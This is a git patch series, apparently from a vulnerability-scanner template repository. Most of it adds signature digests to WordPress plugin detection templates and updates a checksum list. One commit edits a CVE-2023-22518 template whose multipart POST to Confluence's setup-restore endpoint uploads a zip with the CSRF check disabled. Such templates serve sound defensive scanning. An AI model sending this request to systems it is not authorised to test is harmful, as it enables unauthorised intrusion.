a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200bcd1c6581ec980a83878ce77a189c6b7ea12e35fa2fe2f5df01036863f2c567022100c8d092aad6d405307d98203afe356d849324b8ee99733e3aad63ddaa58dd6e3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..ffa66a5821 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220175b9ec94f5da1d83b7607152e299260dfc0cb370b4cad8f8ceb41130af59f4e022100bf96473c3eb518eef9c12efa47bdb562816d2181de1b2d6ea34c093d781d5ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 51945eeedf..ffbbe75d22 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c76af477a0a98f7cfc3d3d1024a9a7012793af9affc8818c4f4b099c907ef7f902201d5e6381d5f5328b3d24cca47af318333dacfce69798c9ed35b9d7c532e7058d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..d333e18af6 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202cd99a595a0495dde2f207b86a232b939e47ae71d6fafb1fbaafc8da279683160220203a0aa9a1acca9419a04d3d1ee4909f46be2b36e73eaa0ca1a0feac9969174b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..5fa12de48f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f1698a29285e443f983e5ce7bc2b5e5ebe213789b5914a4c49e08c56f27e76e02202fd8734a14c70965c94a10f5a76985585dd5fcfe9eecd7f0fe9e8ebd04025443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..9ab4cd4e53 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206badc48455365452aed55606fb2d68a8a132c5693cf885e9da86b0130357127d02201c3b1515611527150b62289c838559b0876f52c7eb89b60d604287700d17e68f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..f0cb23837b 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100846ed1b517c01b51011283959695c043000dab090ecd525b8728387c0f47313f022007fe71d70a6788faa11b33f95f9c8f5995f360e1b8003d99c0b7ffd9c7daf2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..412fd9958a 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022040d1da29b7f5496c3657510e32481a5dea9a4765301512672398e9d67e7e39060220104ba355c547e28b3d232454d0b177fb04d92cd8845ab0212e09953ff5256371:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..648fadaa9a 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201fc32e228d6965f1aba3151b6107eb54803b5e94bf0a87e960aaf9702de7d88d022100e726b7a5862d154abacaaa04c2755b5eb110dd8691702953b68dc894355e4039:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..5986545831 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022011d3c976486d7493de281aac86a4627588ebd0cdfba4756456540be991c8f5aa02204fb65dc757de6652b5cdc36ab280d9cf61fb31836cd4f1f1d0564ba4c08d249f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..4565795de1 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207c5e5858b207890b0228d7a89f2a17f6ac1767d06e9585320a7af77192546050022100e0aaa667aac4193b9dd7654e583c9687ab2146af4d8c5c91db1bba9f3515474a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..5a65dc8fbc 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202a83c6737f486b9ad1d9dc6335fe9456fb2fe3d1087f68fc7a6e4d5e04aca75c022100ebb8661f0afb174afee02ce9f6b9b723ef9b49008e05cba0c5ba08c847e918ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..d18ecc83dc 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100886be4dfa15df94e108ef44ebe09de9b28cd4449df2ea1fbb503fffe4bfffea702206470c1505407146f82b96436825182be0598f33b5178ae35a523b44c1f3e46a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..21013cd114 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f08a3e186608179f3e83a74e92174a0adfd3872dde9411c7c46e1e6c7f9e56f9022074138f98e8d93e3ef97e09be477e056b7db8a3c5313a238c9a0965c2a944088a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..5826884e8a 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100acb80329b80b23635fab528eedb9059c6f5f3fa8b49c984f998a39fada66cf9f02207541fe14810ee22e1d17645834edeb2f58b663d9fa0aaa0736a000b9e0866e6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..bbd2b9963b 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022001f5c0351ea6d84bfe7e387548e611415b8fe9c3680a2db0f2038a100890be04022100aec80bfef48a9eeeba1349068fbb073fad57a176c4f43ce6059182d568aa3778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..9ad122c5db 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008fac626f0cc4da1553486998fd2f566dafd5fbdabacd8bf0af030c0d7353df24022063b2af66e7e865bc5ddcba5fdedf20281e250f6fc2a5e2edb89ff14dfab1fe26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..22ff614409 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210088cf7773435eecca072893286f514bf34597632627cf40251cc068ce21a5a5dc022100a5eb5d2e8db6b0eed675e01dc75857e3541728c7674b2d769631b5402ff23fdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..bf421795e4 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f91bbc48ba3b7c1d740dfa82d4e1c9c7ed1eb86eab536d2c154cf374fceec53022100b29913e9da9d59c16af13cccb4f2107be0b167e6a6022c48de4c6bd8097fc347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..f522524a1b 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202749bacd2ec7bdcf93fd1a3822aee25592895d862132688526a88134d408a04502202a1171f6299268d2869d8b495df2d13d6facf9c8541307a212ea40a07e187531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..08ce153cea 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c72fef6975b501197533c1f430e0920b1fd920e13154977b3c6cef61c32fd558022100aab61a7e3a97dcfd7f426bc62abedab63a95b0c81b9be920da0f3a51c011058d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..12e766451e 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bbba48fa96e082ae02d98b4f923d1426bafc9e29e94cfecf448e3166988d1846022069c391bdf899f85f0279ae717333d688024089c4ccd83abcd49e7e596ac55534:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..ee78b10222 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100abeef94dc28fd2b4a8fa7b9d56f3f1a3bfa5244dcd95f0c36f4ffb23b2acde85022100cd1cd5af9f7f356b7c179e74685cb9838acadc7d1546cb5c7f8b8313cba69c65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 2276545093..d8a3837b9d 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008052f37309b0f03997fc03bf251de67b5fe0fa90a26a877ab726ec99d5bfcaac022013bedbfd4c475efef3856c8e2431c3424e40f6ecbf921c2db0b1e66bd7da56bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..04b751c61a 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100965e7b85f621e000b4fbb04ad940d2410a9ddd489d6e9ab757ca4dfd50be1e88022100c7927d1da4287b940995e7a91d7624e226648ac6830e57b39741a81c7dbd17d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 27f6d46c2b..f9ea72fc64 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e44eba7056a884212d343f5a9da8190f187b5e3c11303c8d204bc142179de1c40221008f57f5bbfe923ffffe4fc6993c8c7cb54ab509506eeaa8b39d04a89e54d07904:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..6c7f1b1893 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd14c6a6c036001cc26dd91fc225a03ba828cd48f13b7178e79bf87d3836bab7022040efeb39ac8b52af882d7e132ad6060cd7bfc02672bd0e93bea308c4e2bcd916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..941ddebf0b 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f54e47abb854e93ddac15182d301969d94f06638340fd743168e5517daf2eaf402207fe2e5f9b50ddd6cd5b9f147d3350d06fa86f77dd90096724be6fdd67d9e913d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..2f7a23cf91 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022054ac90fb26aa6f369a58942693dc48f31db219078777954296a7d508fd4e26f0022100ad83bfe2cf4dc9434633cc18f4ee0330c59bafa4290320bef769d2f41a40ed60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..6f4832b807 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dee5a0855f1ef59945db83b0b5a136d72b1f8c487617f4367e1f054b71db297a02202128246e0cd5a30d9a2340c6a6911e64c38e65864d152711dc7c183b4e619368:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..1e6351c2c5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008e0ed857afe7606ef34fabf0ffa7fff81b1e99f4f4e0a1ea516bd1ab49a05ca5022100e997a153d46ddff6d35a2391cf090310f86af18a527d62363a24f6746671c76e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..033cce6c90 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c88b61d84061aaadbde628ab67e0dc54d95681d61d3f8a98d129d0f8943a36e022100be7e0afbfc9a41ed8c29906472ee387354992cc64192c092d02429a98fad27fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..3aa20a3c35 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022008297cf68cb109e905c7b9fefb1da19652baf0d99c42804334b4da139197b9f20220137e5bda1fa9c94eedf48fc8e5a5a3a5391b23db83b6fb5f17d2c4e11fa7d456:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..d0f3504cbb 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022058fbee65c6a1c468646c541a0fa988c2610023923bbd3d075c26a9593446dac902206cbd84316cf6e6bb3140e74b1c61077217f4b11bf5a238f342988ccdf0851fc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..6305600855 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202668b69b39777fed3d1f72691e1c988e1bce096c70300bf5c338127cad198a9d022100a0a749d5c49dabdb2f0faee24685ea86321cf8b1ba2cdb9d03cc3d8d69220f09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From af5b9c1d670a3aa38388407581cd938ebbcd306b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 3 Nov 2023 15:12:30 +0530 Subject: [PATCH 10/36] make matcher works! --- http/cves/2023/CVE-2023-22518.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index cd596eff90..3f8ca1a764 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -33,11 +33,12 @@ http: POST /json/setup-restore.action HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7 + X-Atlassian-Token: no-check ------WebKitFormBoundaryT3yekvo0rGaL9QR7 Content-Disposition: form-data; name="buildIndex" - true + false ------WebKitFormBoundaryT3yekvo0rGaL9QR7 Content-Disposition: form-data; name="file";filename="{{randstr}}.zip" From 659e75183c317a60b947728168f37202ec97d042 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 09:43:09 +0000 Subject: [PATCH 12/36] Auto Generated Templates Checksum [Fri Nov 3 09:43:09 UTC 2023] :robot: --- templates-checksum.txt | 404 ++++++++++++++++++++--------------------- 1 file changed, 202 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7fd1002f1a..bfe2a025bd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2616,7 +2616,7 @@ http/cves/2023/CVE-2023-22463.yaml:d2440a47082ab058aabcb2ca3655fce7305bc37e http/cves/2023/CVE-2023-22478.yaml:c62d76dd2ea11531093a0569fb16255f67211392 http/cves/2023/CVE-2023-22480.yaml:c89ac259667de547b9d4dde653a4f0ea5b47c7d6 http/cves/2023/CVE-2023-22515.yaml:7811582f649c5efef338ffa8fc7d123feb7b66e4 -http/cves/2023/CVE-2023-22518.yaml:c50845936bfed273a771fa8638acb95aeab42c6d +http/cves/2023/CVE-2023-22518.yaml:eb71ae85f61f478bfa39b014f47cb6d012a2b91f http/cves/2023/CVE-2023-2252.yaml:bb02189bc936b107119e8db698983075c295bb78 http/cves/2023/CVE-2023-22620.yaml:d17b60c3caac0cf4bee31e6d9700899a1c8a41a2 http/cves/2023/CVE-2023-2272.yaml:8273092cf0ee581de5f8b05df388aa571c7e5f1d @@ -6098,219 +6098,219 @@ http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:d9fdd79f207bada4455e74d1bba3391295bb9663 +http/technologies/wordpress/plugins/add-to-any.yaml:f9d3e245dd3372951f668eeaa60ed332417af271 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:fff97e4a13bd53e98ae9d26c7bf7ae365c17916f http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:cd651c83f08f229cb414b7151f8045287dc54fec -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9fe8c1f3217ebdde10e52c54a4f1d345ec68c22e +http/technologies/wordpress/plugins/akismet.yaml:14472ce976103cf7cbbc9fb549f49373daafbcc7 +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:68eb63356af56c5b732b4284813f285f2e5159b2 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:4efd25c4e8b1be7c206e317954e3e19aef0df37b +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:fd324badec7196e2b39d4606ffeea5b78a1f3dba +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6f7f8387a4b87285cc967ad1d442339c54a57989 +http/technologies/wordpress/plugins/amp.yaml:6e9833062a1e2ca1fd164c557bad1092ab981aec +http/technologies/wordpress/plugins/antispam-bee.yaml:400e84c706f54dadfd79120922280f9fb471ded8 +http/technologies/wordpress/plugins/astra-sites.yaml:b8ee380f5ac7b348d2b46402fa6a6ad9f448381f +http/technologies/wordpress/plugins/astra-widgets.yaml:f5c43b2ed54f7afb030f193ed3aa07303c99b38a +http/technologies/wordpress/plugins/autoptimize.yaml:d2a9455241e0d877920e3f269b7fa44647a8cda5 +http/technologies/wordpress/plugins/backwpup.yaml:3721dab5bb97b1788f53139d903d537eb316961e +http/technologies/wordpress/plugins/better-search-replace.yaml:b01084bc606659b34d7ee2ddde2371d50e5ac26a 